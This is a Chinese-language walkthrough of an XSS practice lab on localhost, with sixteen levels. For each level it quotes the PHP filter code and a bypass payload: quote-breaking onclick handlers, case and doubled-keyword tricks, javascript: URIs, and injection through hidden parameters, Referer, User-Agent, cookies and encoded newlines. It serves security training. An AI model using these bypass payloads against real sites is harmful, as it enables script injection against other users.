xss靶场练习

- Pass-1

127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

通过
- Pass-2
直接插入不行，引号将其包裹起了

http://127.0.0.1/xss/level2.php?keyword="><--

- Pass-3
审查元素看看

看似和2没啥区别 但与level2不同的是，value做了校验，双引号和尖括号都被校验了
可以集合单引号和事件来触发

‘ onclick='alert(1)

- Pass-4

可以看到对< >进行了过滤
由下图可以看出是双引号包裹得

" οnclick="alert(1)"

- Pass-5

对script进行了过滤
看了下还是双引号包裹

过滤了

" οnclick="alert(1)"

看手源码

"><a href='javascript:alert(1)'>  

- Pass-6
过滤

$str = $_GET["keyword"];
$str2=str_replace(",",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

可大小写绕过

"><Script>alert(1)</script>

- Pass-7

ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

"><scriscriptpt>alert(1)</scriscriptpt>

- Pass-8

ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);

绕过

javascript:alert(1) 

- Pass-9

ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '
友情链接';
        }
else
{
  echo '
.$str7.'">友情链接';
}
?>
<center><img src=level9.png></center>
<?php 
echo "
payload的长度:".strlen($str7)."
";
?>

javascript:alert(1)//http://

- Pass-10

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.'" type="hidden">
.'" type="hidden">
.$str33.'" type="hidden">

';
?>
<center><img src=level10.png></center>
<?php 
echo "
payload的长度:".strlen($str)."
";
?>

从代码中可以看到是有几个隐藏参数的如下构造

http://127.0.0.1/xss/level10.php?name=1&keyword=1&t_sort=%22type=%22text%22%20onclick=%22alert(1)

- Pass-11

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.'" type="hidden">
.'" type="hidden">
($str00).'" type="hidden">
.$str33.'" type="hidden">

';
?>

显然只能从$str11=$_SERVER[‘HTTP_REFERER’];入手了

" type="text" οnclick="alert(1)

- Pass-12

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'

.'" type="hidden">
.'" type="hidden">
($str00).'" type="hidden">
.$str33.'" type="hidden">

';
?>

这个就是从user-agent入手

" type="text" οnclick="alert(1)

- Pass-13

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

cookie注入点

user= " type="text" οnclick="alert(1)

- Pass-14
略
- Pass-15

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '.htmlspecialchars($str).'"></span></body>';
?>

注入代码

'level1.php?name='

因为这里要访问上面的angular.min.js这个js文件，才能进行包含，虚拟环境里面无法访问那个js，因为需要fanqiang才能访问
ng-include：相当于文件包含。用于包含外部的HTML文件，可以作为一个属性，或者一个元素使用

onerror:
οnerrοr=handleErr

function handleErr(msg,url,l)
{
//Handle the error here
return true or false
}

- Pass-16

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace("	"," ",$str4);
echo "".$str5."";
?>

换行符%0a（换行）或者%0d（回车）绕过

<img%0asrc=x%0aonerror="alert(1)">
//src=#就会把后面的都注释掉了